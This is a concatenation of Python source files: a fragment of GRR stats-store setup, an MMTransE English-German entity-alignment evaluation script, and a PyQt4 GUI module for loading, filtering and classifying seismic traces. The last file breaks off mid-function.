token = access_control.ACLToken(username="GRRStatsStore").SetUID()
global STATS_STORE
STATS_STORE = aff4.FACTORY.Create(None, StatsStore, mode="w", token=token)
try:
STATS_STORE.Flush()
except access_control.UnauthorizedAccess:
logging.info("Not writing aff4:/stats_store due to lack of permissions.")
# We don't need StatsStoreWorker if there's no StatsStore.process_id in
# the config.
stats_process_id = config.CONFIG["StatsStore.process_id"]
if not stats_process_id:
return
stats_store_worker = StatsStoreWorker(STATS_STORE, stats_process_id)
stats_store_worker.RunAsync()
|
test_MMTransE_lan_mapping_120k_fk.py
|
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../src/MMTransE'))
from MMTransE import MMTransE
import time
import multiprocessing
from multiprocessing import Process, Value, Lock, Manager, Array
import numpy as np
from numpy import linalg as LA
fmap = os.path.join(os.path.dirname(__file__), '../../data/WK3l-120k/en_de/en2de_fk_120k.csv')
fmap2 = os.path.join(os.path.dirname(__file__), '../../data/WK3l-120k/en_de/de2en_fk_120k.csv')
fmodel = os.path.join(os.path.dirname(__file__), '../../models/en_de/model_MMtransE_person_120k_ed.bin')
ofile1 = os.path.join(os.path.dirname(__file__), '../../results/P_test_en2de_score_MM_120k.txt')
ofile4 = os.path.join(os.path.dirname(__file__), '../../results/P_test_de2en_score_MM_120k.txt')
ef_map = {}
fe_map = {}
vocab_e = []
vocab_f = []
topK = 10
model = MMTransE()
model.load(fmodel)
def seem_hit(x, y):
for i in y:
if x.find(i) > -1 or i.find(x) > -1:
return True
return False
for line in open(fmap):
line = line.rstrip('\n').split('@@@')
if len(line) != 2:
continue
vocab_e.append(line[0])
if ef_map.get(line[0]) == None:
ef_map[line[0]] = [line[1]]
else:
ef_map[line[0]].append(line[1])
for line in open(fmap2):
line = line.rstrip('\n').split('@@@')
if len(line) != 2:
continue
vocab_f.append(line[0])
if fe_map.get(line[1]) == None:
fe_map[line[1]] = [line[0]]
else:
fe_map[line[1]].append(line[0])
print "Loaded en_de de_en mappings."
#en:...
manager = Manager()
lock1 = Lock()
past_num = Value('i', 0, lock=True)
score = manager.list()#store hit @ k
rank = Value('d', 0.0, lock=True)
rank_num = Value('i', 0, lock=True)
cpu_count = multiprocessing.cpu_count()
t0 = time.time()
def test(model, vocab, index, src_lan, tgt_lan, map, score, past_num):
while index.value < len(vocab):
id = index.value
index.value += 1
word = vocab[id]
if id % 100 == 0:
print id ,'/', len(vocab), ' time used ',time.time() - t0
print score
print rank.value
tgt = map.get(word)
cand = model.kNN_entity_name(word, src_lan, tgt_lan, topK)
cand = [x[0] for x in cand]
tmp_score = np.zeros(topK)
hit = False
last_i = 0
cur_rank = None
if tgt == None:
continue
for i in range(len(cand)):
last_i = i
tmp_cand = cand[i]
if hit == False and (seem_hit(tmp_cand, tgt) == True):
hit = True
if hit == True:
tmp_score[i] = 1.0
if cur_rank == None:
cur_rank = i
while last_i < topK:
if hit:
tmp_score[last_i] = 1.0
last_i += 1
if len(score) == 0:
score.append(tmp_score)
else:
with lock1:
score[0] = (score[0] * past_num.value + tmp_score) / (past_num.value + 1.0)
past_num.value += 1
if cur_rank != None:
rank.value = (rank.value * rank_num.value + cur_rank) / (rank_num.value + 1)
rank_num.value += 1
continue
tmp_dist = 2
vec_t = None
vec_s = model.entity_transfer_vec(word, src_lan, tgt_lan)
for tmp_vec in tgt:
tmp_vec_t = model.entity_vec(tmp_vec, tgt_lan)
if tmp_vec_t is None:
continue
cur_dist = LA.norm(tmp_vec_t - vec_s)
if cur_dist < tmp_dist:
tmp_dist = cur_dist
vec_t = tmp_vec_t
if vec_t is None:
continue
cur_rank = model.entity_rank(vec_s, vec_t, tgt_lan)
rank.value = (rank.value * rank_num.value + cur_rank) / (rank_num.value + 1)
rank_num.value += 1
index = Value('i',0,lock=True)
processes = [Process(target=test, args=(model, vocab_e, index, 'en', 'de', ef_map, score, past_num)) for x in range(cpu_count - 1)]
for p in processes:
p.start()
for p in processes:
p.join()
with open(ofile1, 'w') as fp:
fp.write(str(rank.value) + '\n')
for s in score[0]:
fp.write(str(s) + '\t')
print 'Finished testing en to fr'
#fr:...
manager = Manager()
past_num = Value('i', 0, lock=True)
score = manager.list()#store hit @ k
rank = Value('d', 0.0, lock=True)
rank_num = Value('i', 0, lock=True)
index = Value('i',0,lock=True)
processes = [Process(target=test, args=(model, vocab_f, index, 'de', 'en', fe_map, score, past_num)) for x in range(cpu_count - 1)]
for p in processes:
p.start()
for p in processes:
p.join()
with open(ofile4, 'w') as fp:
fp.write(str(rank.value) + '\n')
for s in score[0]:
fp.write(str(s) + '\t')
print 'Finished testing fr to en'
|
picoss_func.py
|
import sys
sys.path.append('..')
import gc
import numpy as np
import obspy
import math
import multiprocessing
from obspy import UTCDateTime
import os
# Graphical Packages
from PyQt4 import QtGui, QtCore
from matplotlib.widgets import RectangleSelector
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
# Main PICOSS modules
import picoss_main
from menus import DialogFolder
from menus import DialogConnection
from menus import DialogComponents
from menus import DialogStations
from menus import DialogFiltering
from menus import DialogPickingFile
from menus import DialogSave
from menus import DialogTrigger
from menus import DialogAmpa
from menus import DialogFI
from menus import DialogLoadResults
import gui_functions
import utils
class WindowLoadFolder(QtGui.QMainWindow, DialogFolder.Ui_MainWindow):
""" This class handles the data loading from an input folder.
"""
def __init__(self, parent):
super(WindowLoadFolder, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
# Here, we should add the listener
self.pushButton_4.clicked.connect(self.get_info)
self.pushButton_3.clicked.connect(self.load_isolated)
self.filename = None
self.job = None
self.sta_lta = False
def get_info(self):
"""Function to get the trace info"""
if self.filename is None:
self.parent().msg_box("Can not submit without a file!", "Choose one file")
elif self.filename is not None and self.sta_lta:
self.update_parent_fromText()
self.parent().plot_trigger()
self.close()
else:
# In case the file is chosen, we get the attributes we want
self.update_parent_fromText()
self.parent().plot_from_file()
self.close()
def update_parent_fromText(self):
self.parent().station = str(self.station_2.text())
self.parent().channel = str(self.channel_2.text())
self.parent().network = str(self.network_2.text())
self.parent().location = str(self.location_2.text())
self.parent().day_of_the_year = str(self.day_of_the_year.text())
self.parent().trace_loaded_filename = str(self.filename)
def autocomplete(self, string):
arr = string.split("/")[-1].split(".")
if len(arr) != 0:
self.network_2.setText(arr[0])
self.station_2.setText(arr[1])
self.channel_2.setText(arr[3])
self.day_of_the_year.setText(arr[-1])
def load_isolated(self):
self.filename = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'data/'))
self.label_filename_2.setText(self.filename)
self.autocomplete(self.filename)
class WindowConnection(QtGui.QMainWindow, DialogConnection.Ui_MainWindow):
"""
This class handles the connection with the data repositories and send back the data to the main interface.
"""
def __init__(self, parent):
super(WindowConnection, self).__init__(parent)
self.setupUi(self)
self.requestbutton.clicked.connect(self.requestdata)
self.cnt = None
def select_client(self, client):
"""
Function that creates the client for connectivity according to user's input, and link with the users variables.
Args:
client: str
The type of client we want to connect with.
"""
if client == 'Earthworm':
from obspy.clients.earthworm import Client as EClient
self.cnt = EClient(self.ip_address, int(self.port))
elif client == 'Seedlink':
from obspy.clients.seedlink import Client as SClient
self.cnt = SClient(self.ip_address, int(self.port))
elif client == 'FDSN':
from obspy.clients.fdsn import Client as FClient
self.cnt = FClient(self.ip_address, self.port)
elif client == 'arclink':
from obspy.clients.arclink import Client as AClient
self.cnt = AClient(self.ip_address, int(self.port))
else:
from obspy.clients.iris import Client as IClient
self.cnt = IClient("IRIS")
def requestdata(self):
""" Native function to request data from the clients."""
self.ip_address = self.ip_c.text()
self.port = int(self.port_c.text())
if self.ip_address == '' or self.port == '':
gui_functions.msg_box("IP address or port seems empty", "Please, enter data correctly!")
self.parent().network = str(self.network_c.text())
self.parent().station = str(self.station_c.text())
self.parent().channel = str(self.channel_c.text())
self.parent().location = str(self.location_c.text())
# self.parent().component = str(self.component_c.text())
# self.parent().trace_number = str(self.numtraceBox.value())
self.parent().start_data = UTCDateTime((self.startTime.dateTime().toPyDateTime()))
self.parent().end_data = UTCDateTime((self.endTime.dateTime().toPyDateTime()))
# request the data
self.select_client(str(self.comboServers.currentText()))
st = self.cnt.get_waveforms(self.parent().network, self.parent().station,
self.parent().location,
self.parent().channel,
self.parent().start_data,
self.parent().end_data)
# a test trace below for test. Remove on final versions.
# st = "9702-10-1441-50S.MVO_18_1" #this is only from test!!
self.parent().trace_loaded = st
self.parent().stream = st
self.close()
gc.collect()
self.parent().plot_from_server()
class WindowComponents(QtGui.QMainWindow, DialogComponents.Ui_MainWindow):
def __init__(self, parent):
super(WindowComponents, self).__init__(parent)
self.setupUi(self)
# Define the parent window
self.parentWindow = picoss_main.Ui_MainWindow
# Define the push buttons we want to use.
self.pushButton_3.clicked.connect(self.load_data)
self.pushfirst.clicked.connect(self.plot_comp)
# Define current x1 and x2, as zero.
self.current_x1, self.current_x2 = self.parent().x1, self.parent().x2
self.current_fm = self.parent().fm
# Define the labels for the text.
self.label_t0.setText(str(self.current_x1))
self.label_t1.setText(str(self.current_x2))
# Define the active components.
self.active_component = None
self.trace_component = None
self.filename_c = None
def load_data(self):
"""
Function to load the component data from a given, and link the loaded data, with the active component.
"""
self.refresh()
self.filename_c = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'data/'))
self.label_loaded.setText(self.filename_c)
self.active_component = obspy.read(self.filename_c)
self.process_component()
def process_component(self):
"""
Function to process, by filtering and merging, a loaded component of the trace.
Returns:
trace component with the numpy array loaded.
"""
filtered = self.active_component.filter("highpass", freq=self.parent().highpass_freq)
self.active_component = filtered.merge(method=0, fill_value='interpolate')
self.trace_component = self.active_component[0]
return self.trace_component
def select_from_component(self, t0, t1, fm):
"""
Function that select a specific time scale in a given trace
Args:
t0 : int
The starting time of the trace
t1 : int
The end time of the trace
fm : float
The sampling frequency of the trace
Returns :
Numpy
The selected part of the trace.
"""
trace_c = self.trace_component.data
timeScale = np.asarray([t0, t1]) * fm
return trace_c[int(timeScale[0]):int(timeScale[1])]
def plot_comp(self):
""" Function to plot the component, similar to the one in run_picos.py
Additional functions and auxiliary code is appended via run_picos.py
"""
if (self.active_component is None) or (int(self.current_x2) == 0):
pass
else:
self.refresh()
portion = self.select_from_component(self.current_x1, self.current_x2, self.current_fm)
# canvas signal 1
timeVector = np.linspace(self.current_x1, self.current_x2, len(portion))
self.ax = self.figura_signal_1.add_subplot(111)
# discards the old graph
self.ax.cla()
self.ax.plot(timeVector, portion)
self.canvas_signal_1.draw()
self.ax1 = self.figura_fft_1.add_subplot(111)
self.ax1.cla()
self.ax1.specgram(portion.flatten(), NFFT=64, Fs=self.current_fm, noverlap=32, cmap='jet')
self.canvas_fft_1.draw()
def refresh(self):
self.current_x1 = self.parent().x1
self.current_x2 = self.parent().x2
self.label_t0.setText(str(self.current_x1))
self.label_t1.setText(str(self.current_x2))
class WindowStations(QtGui.QMainWindow, DialogStations.Ui_MainWindow):
"""
Function that loads another station to visualize multi-components separately.
By loading another station in the program, we can see attenuation and similar
phenomena. Alternatively, other data files can be loaded within the interface.
"""
def __init__(self, parent):
super(WindowStations, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
self.filename_c = ""
# This gets the position in the parent node to infer (approximately) where we are in the new one
self.current_x1 = self.parent().x1
self.current_x2 = self.parent().x2
self.delta_align = None
self.st1, self.st2, self.fm_s, self.hbf = 0, 0, 0, 0
self.axis_station = None
self.axis_specgram = None
self.station_stream = None
self.trace_stream = None
self.load_button.clicked.connect(self.load_data)
self.pushfirst.clicked.connect(self.plot)
self.pushButton.clicked.connect(self.refresh)
self.specgram_button.clicked.connect(self.specgram_plot)
self.checkBox_trace.clicked.connect(self.enable_params)
self.set_text_positions(self.current_x1, self.current_x2)
def set_text_positions(self, t0, t1):
self.label_start.setText(str(round(t0, 2)))
self.label_end.setText(str(round(t1, 2)))
def compute_delta_alignment(self):
time_main = self.parent().active_trace.stats.starttime
time_station = self.trace_stream.stats.starttime
return float(math.ceil(time_station - time_main))
def process_station(self, stream, fm_s, high_freq):
"""
Function to process the streams for any given station.
Any missing values are interpolated and filled with zeroes.
Args:
stream : Obspy.Stream object
The seismic data stream we want to process.
fm_s : float
The sampling frequency of the stream
high_freq : float
The default high frequency we want to work with
Returns:
numpy array containing the full trace.
"""
aux = stream.copy() # to avoid modification of the trace.
filtered = aux.filter("highpass", freq=high_freq)
merged = filtered.merge(method=0, fill_value='interpolate')
return merged[0]
def keyPressEvent(self, event):
"""
Handle the click of events. If not clicked within the available options, it just get ignored.
Args:
event: QtGui.QKeyEvent
The type of event that has been clicked and selected.
"""
if type(event) == QtGui.QKeyEvent:
if event.key() == QtCore.Qt.Key_Z and self.axis_station:
self.axis_station.toolbar.zoom()
elif event.key() == QtCore.Qt.Key_S and self.axis_station:
self.axis_station.toolbar.pan()
elif event.key() == QtCore.Qt.Key_U and self.axis_station:
self.axis_station.toolbar.home()
elif event.key() == QtCore.Qt.Key_Q:
self.close()
else:
event.ignore()
def load_data(self):
"""Load the data from a folder"""
self.refresh()
self.filename_c = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'data/'))
self.loaded_station_label.setText(self.filename_c)
self.station_stream = obspy.read(self.filename_c)
self.fm_s = self.station_stream[0].stats.sampling_rate
self.fm_newstation.setText(str(self.fm_s))
self.high_pass_fre.setText(str(0.5))
def plot(self):
self.refresh()
if self.parent().active_trace is None or self.filename_c == "":
pass
elif self.checkBox_trace.isChecked():
# get the filepath
filepath = str(self.loaded_station_label.text())
self.fm_s = float(self.fm_newstation.text())
self.hbf = float(self.high_pass_fre.text())
self.station_stream = obspy.read(filepath)
self.st1, self.st2 = 0, 0
self.clear_canvas()
else:
self.trace_stream = self.process_station(self.station_stream, self.fm_s, self.hbf)
self.delta_align = self.compute_delta_alignment()
time_Vector = np.linspace(0, len(self.trace_stream) / self.fm_s, num=len(self.trace_stream.data))
# create an axis
self.axis_station = self.figure_signal.add_subplot(111)
# discards the old graph
self.axis_station.cla()
self.axis_station.plot(time_Vector, self.trace_stream.data)
self.selector_station = RectangleSelector(self.axis_station, self.get_current_pos,
drawtype='box', useblit=True, button=[1],
minspanx=5, minspany=5, spancoords='pixels',
interactive=True)
self.axis_station.toolbar = NavigationToolbar(self.canvas_signal, self)
self.axis_station.axvline(self.current_x1, color='darkgreen', linestyle='solid')
self.axis_station.axvline(self.current_x2, color='green', linestyle='solid')
self.axis_station.axvline(self.delta_align + self.current_x1, color='orange', linestyle='dotted',
linewidth=2)
self.canvas_signal.draw()
gc.collect()
def get_current_pos(self, eclick, erelease):
self.st1 = eclick.xdata
self.st2 = erelease.xdata
def enable_params(self):
if self.checkBox_trace.isChecked():
self.fm_newstation.setEnabled(True)
self.high_pass_fre.setEnabled(True)
else:
self.fm_newstation.setEnabled(False)
self.high_pass_fre.setEnabled(False)
def refresh(self):
self.current_x1 = self.parent().x1
self.current_x2 = self.parent().x2
self.set_text_positions(self.current_x1, self.current_x2)
if self.axis_station:
[self.axis_station.lines[-1].remove() for x in range(3)]
self.axis_station.axvline(self.current_x1, color='darkgreen', linestyle='solid')
self.axis_station.axvline(self.current_x2, color='green', linestyle='solid')
self.axis_station.axvline(self.delta_align + self.current_x1, color='darkorange', linestyle='dotted',
linewidth=2)
self.canvas_signal.draw()
def reset(self, interactive):
"""Function to reset the controls and the main interface."""
if interactive and self.axis_station is not None:
mode = self.axis_station.get_navigate_mode()
if mode == "ZOOM":
self.axis_station.toolbar.zoom()
else:
self.axis_station.toolbar.pan()
def clear_canvas(self):
"clear the canvas and refres the variables."
self.figure_specgram.clf()
self.canvas_specgram.draw()
self.figure_signal.clf()
self.canvas_signal.draw()
self.refresh()
def specgram_plot(self):
"""Function to plot the spectrogram of the selected event."""
if self.axis_specgram is not None:
self.axis_specgram.cla()
if self.st1 <= 0:
pass
else:
valor = np.asarray([self.st1, self.st2]) * self.fm_s
chunkPlot = self.trace_stream.data[int(valor[0]):int(valor[1])]
self.axis_specgram = self.figure_specgram.add_subplot(111)
self.axis_specgram.cla()
self.axis_specgram.specgram(chunkPlot.flatten(), NFFT=64, Fs=self.fm_s, noverlap=32, cmap='jet')
self.canvas_specgram.draw()
class WindowFrequency(QtGui.QMainWindow, DialogFiltering.Ui_MainWindow):
def __init__(self, parent):
super(WindowFrequency, self).__init__(parent)
self.setupUi(self)
# get the sampling frequency of the parent node.
self.new_fm.setText(str(self.parent().fm))
# get the frequency of the default high frequency filter.
self.highpass_new.setText(str(self.parent().highpass_freq))
self.replot.clicked.connect(self.plot)
# get the name of the loaded trace.
self.filename_current_trace.setText(self.parent().trace_loaded_filename)
# high and low pass buttons.
self.button_bandpass.clicked.connect(self.enable_bandpass)
self.button_highpass.clicked.connect(self.enable_highpass)
def check_param(self, param):
"""Function to check if the input field is empty or not."""
if gui_functions.check_digits(param) and gui_functions.check_emptiness(param):
return True
else:
return False
def enable_bandpass(self):
"""Function to enable bandpass filtering to our data."""
self.bp_highfreq.setEnabled(True)
self.bp_downfreq.setEnabled(True)
self.highpass_new.setEnabled(False)
def enable_highpass(self):
"""Function to enable highpass filtering to our data."""
self.highpass_new.setEnabled(True)
self.bp_highfreq.setEnabled(False)
self.bp_downfreq.setEnabled(False)
def plot(self):
"""Function to plot the frequency options, and re-draw with the new interface options"""
self.parent().reset_interactive()
fm = str(self.new_fm.text())
freq_but = str(self.highpass_new.text())
# Check type of filters and apply to the ORIGINAL data.
if self.button_bandpass.isChecked() and self.check_param(fm):
freq_high = str(self.bp_highfreq.text())
freq_low = str(self.bp_downfreq.text())
if (self.check_param(freq_high) and self.check_param(freq_low)) \
and (float(freq_high) > float(freq_low)):
# clean stuff parent node and re-draw abck
self.parent().clean_figures()
self.parent().prepare_stream(bandpass=[float(freq_low), float(freq_high)])
self.close()
elif self.button_highpass.isChecked() and self.check_param(fm):
if self.check_param(fm) and self.check_param(freq_but):
self.parent().fm = float(fm)
self.parent().clean_figures()
self.parent().highpass_freq = float(freq_but)
self.parent().prepare_stream()
self.close()
else:
pass
class WindowPicklingFile(QtGui.QMainWindow, DialogPickingFile.Ui_MainWindow):
def __init__(self, parent):
super(WindowPicklingFile, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
# Here, we should add the listener
self.pushButton_4.clicked.connect(self.get_info)
self.pushButton_3.clicked.connect(self.load_pfile)
self.filename = None
self.sta_lta = False
def get_info(self):
if self.filename is None:
self.parent().msg_box("Can not plot without preprocessed file!", "Choose one preprocessed file")
elif self.filename is not None:
self.update_parent_fromText()
self.parent().clean_figures()
self.parent().clean_points()
self.parent().clean_canvas()
self.parent().process_triggerfile(str(self.filename))
self.close()
else:
# In case the file is chosen, we get the attributes we want
self.update_parent_fromText()
self.parent().plot_from_file()
self.close()
def update_parent_fromText(self):
self.parent().station = str(self.station_2.text())
self.parent().channel = str(self.channel_2.text())
self.parent().network = str(self.network_2.text())
self.parent().location = str(self.location_2.text())
self.parent().day_of_the_year = str(self.day_of_the_year.text())
self.parent().trace_loaded_filename = str(self.filename)
def autocomplete(self, string):
arr = string.split("/")[-1].split(".")
if len(arr) != 0:
self.network_2.setText(arr[0])
self.station_2.setText(arr[1])
self.channel_2.setText(arr[3])
self.day_of_the_year.setText(arr[-1])
def load_pfile(self):
self.filename = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'picking_data/'))
self.label_filename_2.setText(self.filename)
self.autocomplete(self.filename)
class WindowSaving(QtGui.QMainWindow, DialogSave.Ui_MainWindow):
"""
Function that handles the stations required for saving the data in multiple formats.
As a default "segmented_data" is given as the default folder, but users cans elect and move within their own data
structure. Alternatively, other data files can be loaded within the interface.
"""
def __init__(self, parent):
super(WindowSaving, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
# Here, we should add the listener
self.segmentation_table = self.parent().segmentation_table
self.toSave = None
self.filename.setText(str(self.parent().toSave))
self.label_4.setText("segmented_data/")
# Here, we should add the listener
self.pushButton.clicked.connect(self.browse)
self.buttonCancel.clicked.connect(self.cancel)
self.buttonSave.clicked.connect(self.save_data)
def browse(self):
"""Function to browse the folder structure to save a specific file"""
destination_folder = str(QtGui.QFileDialog.getExistingDirectory(None, "Select Folder"))
self.label_4.setText(destination_folder)
def cancel(self):
"""Close the interface"""
self.close()
gc.collect()
def save_data(self):
"""save the data within the selected folder"""
destination_folder = str(self.label_4.text())
self.toSave = str(self.filename.text())
data_format = str(self.comboBox.currentText())
gui_functions.save_segmentation_table(destination_folder, self.toSave, data_format, self.segmentation_table)
self.close()
class WindowPickingOnFly(QtGui.QMainWindow, DialogTrigger.Ui_MainWindow):
"""
Function that handles the computation of STA/LTA files, and interfaces with the main GUI with the triggering and
plotting functionalities. Alternatively, other data files can be loaded within the interface.
"""
def __init__(self, parent):
super(WindowPickingOnFly, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
self.buttonComputePlot.clicked.connect(self.compute_plot)
self.buttonCancel.clicked.connect(self.cancel)
self.label_loaded.setText(str(self.parent().trace_loaded_filename))
def compute_plot(self):
# get the data from the parent and compute
new_job = multiprocessing.Process(target=self.parent().clean_figures(), args=())
new_job_main = multiprocessing.Process(target=self.parent().clean_canvas(), args=())
new_job.start()
new_job_main.start()
# Get the info and compute
kind, nlta, nsta, tgon, toff = self.get_info()
trace = self.parent().active_trace.copy() # we copy the data to avoid numerical errors.
data = utils.picos_utils.check_masked_array(trace.data)
cft, on_of = utils.picos_utils.compute_sta_lta(data, self.parent().fm, kind, nlta=nlta,
nsta=nsta, trig_on=tgon, trig_off=toff)
self.parent().plot_trigger(on_of)
self.close()
gc.collect()
def cancel(self):
"""close the window"""
self.close()
gc.collect()
def get_info(self):
"""
Get the information required for the STA/LTA algorithm, along with the type of STA/LTA we want to run
Returns:
kind : str
The type of filter we want to have
nlta : float
The length of the LTA window (s)
nsta : float
The length of the STA window (s)
tgon : float
The trigger "on" to consider an activation
toff: float
The trigger "off to deactivate the trigger
"""
nlta = float(self.spin_lta.value())
nsta = float(self.spin_sta.value())
tgon = float(self.trigg_on.value())
toff = float(self.trigg_of.value())
kind = str(self.comboTrigger.currentText()).split(" ")[0]
return kind, nlta, nsta, tgon, toff
class WindowVisualizeResults(QtGui.QMainWindow, DialogLoadResults.Ui_MainWindow):
"""
Function that VISUALIZE THE SEGMENTED EVENTS
"""
def __init__(self, parent):
super(WindowVisualizeResults, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
# Here, we should add the listener
self.pushButton_4.clicked.connect(self.plot_results)
self.pushButton_5.clicked.connect(self.load_main)
self.pushButton_3.clicked.connect(self.load_results)
self.filename_trace = None
self.filename_results = None
def preprocess_results(self, table):
table = np.asarray([l[:2] for l in table[2:]], dtype=float)
return table
def load_main(self):
self.filename_trace = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'data/'))
self.label_filename_1.setText(self.filename_trace)
def load_results(self):
self.filename_results = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'segmentation_data/'))
self.label_filename_2.setText(self.filename_results)
def plot_results(self):
# get the data from the parent and compute
new_job = multiprocessing.Process(target=self.parent().clean_figures(), args=())
new_job_main = multiprocessing.Process(target=self.parent().clean_canvas(), args=())
new_job.start()
new_job_main.start()
# Get the info and compute
trace = str(self.label_filename_1.text())
print("MAIN RESULTS")
results = str(self.label_filename_2.text())
print("***************")
self.parent().trace_loaded_filename = trace
self.parent().plot_from_file()
array_results = np.load(results)
print(array_results[2:])
on_of = self.preprocess_results(array_results)
self.parent().plot_results_seconds(on_of)
#self.close()
#gc.collect()
def cancel(self):
"""close the window"""
self.close()
gc.collect()
class WindowAmpa(QtGui.QMainWindow, DialogAmpa.Ui_MainWindow):
"""
Function that handles the computation of STA/LTA files, and interfaces with the main GUI with the triggering and
plotting functionalities. Alternatively, other data files can be loaded within the interface.
"""
def __init__(self, parent):
super(WindowAmpa, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
self.buttonComputePlot.clicked.connect(self.compute_ampa)
self.buttonCancel.clicked.connect(self.cancel)
self.pushButton.clicked.connect(self.add_filter)
self.label_loaded.setText(str(self.parent().trace_loaded_filename))
def compute_ampa(self):
# get the data from the parent and compute
new_job = multiprocessing.Process(target=self.parent().clean_figures(), args=())
new_job_main = multiprocessing.Process(target=self.parent().clean_canvas(), args=())
new_job.start()
new_job_main.start()
self.compute()
def cancel(self):
"""close the window"""
self.close()
gc.collect()
def get_info_ampa(self):
"""
Function that computes the information required for AMPA
Returns:
window : float
Initial frequency for AMPA
overlap : float
End frequency for AMPA
noise : float
The bandwith with the
uvalue : float
Impulssivenes of the filter response
"""
window = float(self.windowAnalysis.value())
overlap = float(self.percOverlap.value())
noise = float(self.spinBox.value())
uvalue = float(self.uValue.value())
return window, overlap, noise, uvalue
def get_info_filters(self):
"""
Function that gets the info of the filters
Returns:
initfreq : float
Initial frequency for AMPA
endfreq : float
End frequency for AMPA
bandwidth : float
The bandwith with the
beta : float
Impulssivenes of the filter response
L_filters : list
The list of filters we will use
"""
initfreq = float(self.initialfreq.value())
endfreq = float(self.endfreq.value())
bandwidth = float(self.bandWidth.value())
beta = float(self.lcoefficient.value())
L_filters = []
# we recover the correspondent value. CHanges this part in a future
for row in xrange(0, self.tableWidget.rowCount()):
value = str(self.tableWidget.item(row, 0).text())
if gui_functions.check_digits(value):
L_filters.append(value)
return [initfreq, endfreq, bandwidth, beta, L_filters]
def compute(self):
"""Function to link and compute the AMPA method"""
[window, overlap, noise, uvalue] = self.get_info_ampa()
[initfreq, endfreq, bandwidth, beta, L_filters] = self.get_info_filters()
trace = self.parent().active_trace.copy() # we copy the data to avoid numerical errors.
data = utils.picos_utils.check_masked_array(trace.data)
on_of = utils.picos_utils.compute_ampa(data, self.parent().fm, window, bandwidth, initfreq, endfreq, overlap,
noise, uvalue, beta, L_filters)
self.parent().plot_trigger(on_of)
del trace, data
self.close()
def update_rows(self):
numrows = self.tableWidget.rowCount()
new_headers = ["Filter %s" % x for x in xrange(1, numrows)]
self.tableWidget.setVerticalHeaderLabels(new_headers)
def add_filter(self):
row = self.tableWidget.rowCount()
self.tableWidget.insertRow(row)
numrows = self.tableWidget.rowCount()
self.tableWidget.setItem(numrows -1, 0, QtGui.QTableWidgetItem("Write value"))
self.tableWidget.item(numrows-1, 0).setBackground(QtCore.Qt.green)
self.update_rows()
class WindowFI(QtGui.QMainWindow, DialogFI.Ui_MainWindow):
"""
Function that handles the computation of the Frequency Index Classification from the segmented files. Alternatively,
other data files can be loaded within the interface.
"""
def __init__(self, parent):
super(WindowFI, self).__init__(parent)
self.setupUi(self)
self.parentWindow = picoss_main.Ui_MainWindow
# high and low pass buttons.
self.buttonCancel.clicked.connect(self.cancel)
self.buttonLoad.clicked.connect(self.load_file_segmentation)
self.buttonLoadTrace.clicked.connect(self.load_file_trace)
self.radioButtonMX.clicked.connect(self.enable_hybrids)
self.buttonComputeSave.clicked.connect(self.compute_classification)
self.loadedMaintrace.setText(self.parent().trace_loaded_filename)
self.trace = None
self.filename = None
def compute_classification(self):
"""
Functions that computes the
Returns:
"""
destination_folder = str(QtGui.QFileDialog.getExistingDirectory(None, "Select Folder"))
mu_l = -float(self.mu1.value())
mu_h = float(self.mu2.value())
mu_r = float(self.mu3.value())
hyb = self.get_hybrids()
t_user = 25.0
slider = float(self.sliderFrequency.value())
filename_seg = str(self.loadedsegmentation.text())
filename_trace = str(self.loadedMaintrace.text())
if slider < 2:
gui_functions.msg_box("Frequency Index requires broader frequency span", "Please, select Threshold values")
elif filename_trace == '' or filename_seg is '':
gui_functions.msg_box("The segmentation table and/or loaded files are required", "Please, load both files")
else:
# Obtain the main trace
self.trace, fm = self.process_data(filename_trace)
segmentation_times = utils.picos_utils.process_segmentation_table(filename_seg)
candidates_segmented, durations = np.asarray(utils.picos_utils.extract_signals(self.trace.data, fm, segmentation_times))
ratios = utils.picos_utils.evaluate_candidates(candidates_segmented, slider, fm)
labels = utils.picos_utils.evaluate_ratios(ratios, durations, thr_dur=t_user, mu_low=mu_l, mu_high=mu_h, mu_rock=mu_r, mixed=hyb)
#
data_toSave = {"segmentation_times": segmentation_times, "labels":labels}
toSave = "%s_FI.p" % filename_trace.split("/")[-1]
utils.picos_utils.save_pickle(destination_folder, toSave, data_toSave)
gc.collect()
self.close()
def cancel(self):
"""close the window"""
self.close()
gc.collect()
def process_data(self, filename_trace):
"""function to process the data or copy from the main trace"""
try:
trace, fm = utils.picos_utils.process_trace(filename_trace, bandpass=[0.5, 20.0])
except:
trace, fm = self.parent().active_trace, self.parent().fm
return trace, fm
def load_file_segmentation(self):
"""function to load the segmentation file"""
self.filename = str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'segmented_data/'))
self.loadedsegmentation.setText(self.filename)
def load_file_trace(self):
self.loadedMaintrace.setText(str(QtGui.QFileDialog.getOpenFileName(self, 'Open File', 'data/')))
def empty_filed(self, val1, val2):
"""
Function that checks if the hybrid low and hybrid high are checked or not, and if they are number.
Args:
val1 : str:
The first value to check
val2 : str
The second value to check
Returns:
True if any of the fields are empty, or not nobers
"""
cond1 = gui_functions.check_emptiness(val1) and gui_functions.check_emptiness(val2)
cond2 = gui_functions.check_digits(val1) and gui_functions.check_digits(val2)
return cond1 and cond2
def get_hybrids(self):
"""
Function get the information of the hybrids
"""
mu_hybrid_l = str(self.hybridlow.text())
mu_hybrid_h = str(self.hybridhigh.text())
L = None
if self.radioButtonMX.isChecked() and self.empty_filed(mu_hybrid_l, mu_hybrid_h):
L = [float(mu_hybrid_l), (mu_hybrid_h)]
return L
def enable_hybrids(self):
"""Function to enable the hybrids frequency classification"""
